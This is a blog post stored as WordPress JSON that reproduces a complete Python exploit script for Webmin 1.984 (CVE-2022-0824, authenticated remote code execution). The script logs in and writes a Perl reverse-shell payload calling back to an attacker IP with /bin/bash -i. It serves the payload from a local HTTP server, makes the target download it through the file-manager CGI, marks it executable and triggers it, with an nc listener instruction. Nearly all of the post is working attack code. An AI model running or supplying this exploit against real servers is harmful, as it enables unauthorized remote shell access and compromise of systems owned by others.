{"id":21477,"date":"2022-03-09T19:28:21","date_gmt":"2022-03-09T16:28:21","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166240\/webmin1984-exec.txt"},"modified":"2022-03-12T08:24:24","modified_gmt":"2022-03-12T04:54:24","slug":"webmin-1-984-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/webmin-1-984-remote-code-execution\/","title":{"rendered":"Webmin 1.984 Remote Code Execution"},"content":{"rendered":"

# Exploit Title: Webmin 1.984 – Remote Code Execution (Authenticated)
\n# Date: 2022-03-06
\n# Exploit Author: faisalfs10x (https:\/\/github.com\/faisalfs10x)
\n# Vendor Homepage: https:\/\/www.webmin.com\/
\n# Software Link: https:\/\/github.com\/webmin\/webmin\/archive\/refs\/tags\/1.984.zip
\n# Version: <= 1.984
\n# Tested on: Ubuntu 18
\n# Reference: https:\/\/github.com\/faisalfs10x\/Webmin-CVE-2022-0824-revshell<\/p>\n

#!\/usr\/bin\/python3<\/p>\n

“””
\nCoded by: @faisalfs10x
\nGitHub: https:\/\/github.com\/faisalfs10x
\nReference: https:\/\/huntr.dev\/bounties\/d0049a96-de90-4b1a-9111-94de1044f295\/
\n“””<\/p>\n

import requests
\nimport urllib3
\nimport argparse
\nimport os
\nimport time<\/p>\n

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<\/p>\n

TGREEN = ‘\\033[32m’
\nTRED = ‘\\033[31m’
\nTCYAN = ‘\\033[36m’
\nTSHELL = ‘\\033[32;1m’
\nENDC = ‘\\033[m’<\/p>\n

class Exploit(object):
\ndef __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname):
\nself.target = target
\nself.username = username
\nself.password = password
\nself.py3http_server = py3http_server
\nself.pyhttp_port = pyhttp_port
\nself.upload_path = upload_path
\nself.callback_ip = callback_ip
\nself.callback_port = callback_port
\nself.fname = fname<\/p>\n

#self.proxies = proxies
\nself.s = requests.Session()<\/p>\n

def gen_payload(self):
\npayload = (”’perl -e ‘use Socket;$i=””’ + self.callback_ip + ”'”;$p=”’ + self.callback_port + ”’;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“\/bin\/bash -i”);};’ ”’)
\nprint(TCYAN + f”\\n[+] Generating payload to {self.fname} in current directory”, ENDC)
\nf = open(f”{self.fname}”, “w”)
\nf.write(payload)
\nf.close()<\/p>\n

def login(self):
\nlogin_url = self.target + “\/session_login.cgi”
\ncookies = { “redirect”: “1”, “testing”: “1”, “PHPSESSID”: “” }<\/p>\n

data = { ‘user’ : self.username, ‘pass’ : self.password }
\ntry:
\nr = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10)
\nsuccess_message = ‘System hostname’
\nif success_message in r.text:
\nprint(TGREEN + “[+] Login Successful”, ENDC)
\nelse:
\nprint(TRED +”[-] Login Failed”, ENDC)
\nexit()<\/p>\n

except requests.Timeout as e:
\nprint(TRED + f”[-] Target: {self.target} is not responding, Connection timed out”, ENDC)
\nexit()<\/p>\n

def pyhttp_server(self):
\nprint(f'[+] Attempt to host http.server on {self.pyhttp_port}\\n’)
\nos.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ‘) # add 2>\/dev\/null for clean up
\nprint(‘[+] Sleep 3 second to ensure http server is up!’)
\ntime.sleep(3) # Sleep for 3 seconds to ensure http server is up!<\/p>\n

def download_remote_url(self):
\ndownload_url = self.target + “\/extensions\/file-manager\/http_download.cgi?module=filemin”
\nheaders = {
\n“Accept”: “application\/json, text\/javascript, *\/*; q=0.01”,
\n“Accept-Encoding”: “gzip, deflate”,
\n“Content-Type”: “application\/x-www-form-urlencoded; charset=UTF-8”,
\n“X-Requested-With”: “XMLHttpRequest”,
\n“Referer”: self.target + “\/filemin\/?xnavigation=1”
\n}<\/p>\n

data = {
\n‘link’: “http:\/\/” + self.py3http_server + “\/” + self.fname,
\n‘username’: ”,
\n‘password’: ”,
\n‘path’: self.upload_path
\n}<\/p>\n

r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True)
\nprint(f”\\n[+] Fetching {self.fname} from http.server {self.py3http_server}”)<\/p>\n

def modify_permission(self):
\nmodify_perm_url = self.target + “\/extensions\/file-manager\/chmod.cgi?module=filemin&page=1&paginate=30”
\nheaders = { “Referer”: self.target + “\/filemin\/?xnavigation=1” }
\ndata = { “name”: self.fname, “perms”: “0755”, “applyto”: “1”, “path”: self.upload_path }<\/p>\n

r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True)
\nprint(f”[+] Modifying permission of {self.fname} to 0755″)<\/p>\n

def exec_revshell(self):
\nurl = self.target + ‘\/’ + self.fname
\ntry:
\nr = self.s.get(url, verify=False, allow_redirects=True, timeout=3)
\nexcept requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned!
\nprint(TGREEN + f”\\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} – XD”, ENDC)
\nprint(“[+] Shell location: ” + url)
\nelse:
\nprint(TRED + f”\\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}”, ENDC)<\/p>\n

def do_cleanup(self):
\nprint(TCYAN + ‘\\n[+] Cleaning up ‘)
\nprint(f'[+] Killing: http.server on port {self.pyhttp_port}’)
\nos.system(f’kill -9 $(lsof -t -i:{self.pyhttp_port})’)
\nexit()<\/p>\n

def run(self):
\nself.gen_payload()
\nself.login()
\nself.pyhttp_server()
\nself.download_remote_url()
\nself.modify_permission()
\nself.exec_revshell()
\nself.do_cleanup()<\/p>\n

if __name__ == “__main__”:<\/p>\n

parser = argparse.ArgumentParser(description=’Webmin CVE-2022-0824 Reverse Shell’)
\nparser.add_argument(‘-t’, ‘–target’, type=str, required=True, help=’ Target full URL, https:\/\/www.webmin.local:10000′)
\nparser.add_argument(‘-c’, ‘–credential’, type=str, required=True, help=’ Format, user:user123′)
\nparser.add_argument(‘-LS’, ‘–py3http_server’, type=str, required=True, help=’ Http server for serving payload, ex 192.168.8.120:8080′)
\nparser.add_argument(‘-L’, ‘–callback_ip’, type=str, required=True, help=’ Callback IP to receive revshell’)
\nparser.add_argument(‘-P’, ‘–callback_port’, type=str, required=True, help=’ Callback port to receive revshell’)
\nparser.add_argument(“-V”,’–version’, action=’version’, version=’%(prog)s 1.0′)
\nargs = parser.parse_args()<\/p>\n

target = args.target
\nusername = args.credential.split(‘:’)[0]\npassword = args.credential.split(‘:’)[1]\npy3http_server = args.py3http_server
\npyhttp_port = py3http_server.split(‘:’)[1]\ncallback_ip = args.callback_ip
\ncallback_port = args.callback_port
\nupload_path = “\/usr\/share\/webmin” # the default installation of Webmin Debian Package, may be in different location if installed using other method.
\nfname = “revshell.cgi” # CGI script name, you may change to different name<\/p>\n

pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname)
\npwn.run()<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Webmin 1.984 – Remote Code Execution (Authenticated) # Date: 2022-03-06 # Exploit Author: faisalfs10x (https:\/\/github.com\/faisalfs10x) # Vendor Homepage: https:\/\/www.webmin.com\/ # Software Link: https:\/\/github.com\/webmin\/webmin\/archive\/refs\/tags\/1.984.zip # Version: <= 1.984 # Tested on: Ubuntu 18 # Reference: https:\/\/github.com\/faisalfs10x\/Webmin-CVE-2022-0824-revshell #!\/usr\/bin\/python3 “”” Coded by: @faisalfs10x GitHub: https:\/\/github.com\/faisalfs10x Reference: https:\/\/huntr.dev\/bounties\/d0049a96-de90-4b1a-9111-94de1044f295\/ “”” import requests import urllib3 import argparse import …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21477","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21477","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21477"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21477\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21477"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21477"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21477"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}